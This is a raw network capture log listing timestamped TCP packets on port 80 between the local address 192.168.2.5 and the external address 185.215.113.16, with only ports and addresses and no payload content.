Oct 28, 2024 02:07:25.113356113 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.113367081 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.113396883 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.113432884 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.149585009 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149597883 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149609089 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149660110 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.149827003 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149866104 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149877071 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149888992 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.149915934 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.149997950 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150011063 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150022030 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150032997 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150044918 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150072098 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150218010 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150228977 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150243044 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150254011 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150262117 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150286913 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150460005 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150501966 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150512934 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150546074 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150629044 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150640011 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150650978 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150664091 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.150686979 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.150703907 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151355028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151365042 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151375055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151386976 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151397943 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151408911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151412964 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151429892 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151443005 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151662111 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151674032 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151686907 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151698112 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151707888 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151732922 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.151842117 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151854038 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151865959 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.151885033 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.184720039 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.184731007 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.184741020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.184787035 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.187902927 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.187922955 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.187933922 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188004017 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188057899 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188069105 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188182116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188194036 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188205957 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188215017 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188229084 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188232899 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188246012 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188250065 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188261032 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188266993 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188268900 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188275099 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188312054 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188549995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188601017 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188611984 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188641071 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188657999 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.188735008 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188745975 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188756943 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.188776970 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.189097881 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189110041 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189121008 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189131975 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189143896 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189151049 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.189160109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189172983 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189173937 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.189191103 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.189204931 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.189225912 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189235926 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.189270020 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.211653948 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.231110096 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.231127024 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.231198072 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267066002 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267079115 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267096043 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267107964 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267151117 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267162085 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267174959 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267199039 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267267942 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267296076 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267359018 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267400026 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267410040 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267450094 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267455101 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267467976 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267503023 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267637968 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267649889 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267659903 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267673016 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267690897 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267729998 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267839909 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267849922 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267884016 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267918110 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.267927885 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267940044 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.267988920 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268078089 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268125057 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268136978 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268165112 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268172026 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268174887 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268186092 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268229961 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268457890 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268498898 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268587112 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268618107 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268625975 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268630028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268645048 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268656969 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268666029 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268690109 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.268960953 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268971920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.268982887 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.269002914 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.269009113 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.269021034 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.269021988 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.269057035 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.302644968 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.302660942 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.302673101 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.302702904 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306025028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306039095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306051016 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306062937 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306073904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306078911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306082964 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306092978 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306104898 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306116104 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306116104 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306128979 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306140900 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306142092 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306153059 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306154013 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306168079 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306180954 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306185961 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306195021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306206942 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306210995 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306221008 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306227922 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306235075 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306252003 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.306344032 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306354046 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.306386948 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307082891 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307094097 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307106018 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307117939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307126045 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307131052 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307140112 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307145119 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307157993 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307167053 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307169914 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307183981 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307192087 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307195902 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307209969 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307223082 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307226896 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307235956 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.307250023 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.307275057 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.384483099 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384545088 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384553909 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384577036 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384589911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384601116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384632111 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.384660959 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.384747028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384802103 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384879112 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384901047 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384922028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384923935 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.384933949 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.384949923 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.384974003 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385010004 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385035038 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385049105 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385060072 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385082006 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385097027 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385236025 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385346889 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385358095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385368109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385382891 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385391951 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385395050 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385407925 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385433912 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385579109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385592937 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385603905 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385626078 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385720968 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385732889 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385744095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385773897 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385797024 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385847092 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385874987 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385885954 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385926962 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.385967970 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385979891 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.385993004 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386004925 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386017084 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.386017084 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386029959 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.386059046 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.386368990 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386382103 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386392117 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386424065 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.386519909 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386533022 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386543036 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.386591911 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.386591911 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.420082092 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.420093060 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.420131922 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.420150995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.420161963 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.420356035 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.422799110 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.422832012 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.422842979 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.422991037 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423377991 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423394918 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423407078 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423424006 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423439026 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423455954 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423468113 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423479080 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423516989 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423566103 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423590899 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423630953 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423646927 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423681974 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423696995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423710108 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423753023 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423758984 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423787117 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423810959 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.423986912 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.423998117 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424024105 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424030066 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424062967 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424074888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424099922 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424290895 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424303055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424326897 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424346924 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424351931 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424355030 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424365997 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424366951 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424379110 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424392939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424396992 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424405098 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424415112 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424427032 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424865961 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424877882 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424890041 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424901009 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.424913883 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.424938917 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.484793901 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:25.502177954 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502192020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502211094 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502223015 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502242088 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502264977 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:25.502276897 CET	80	49724	185.215.113.16	192.168.2.5
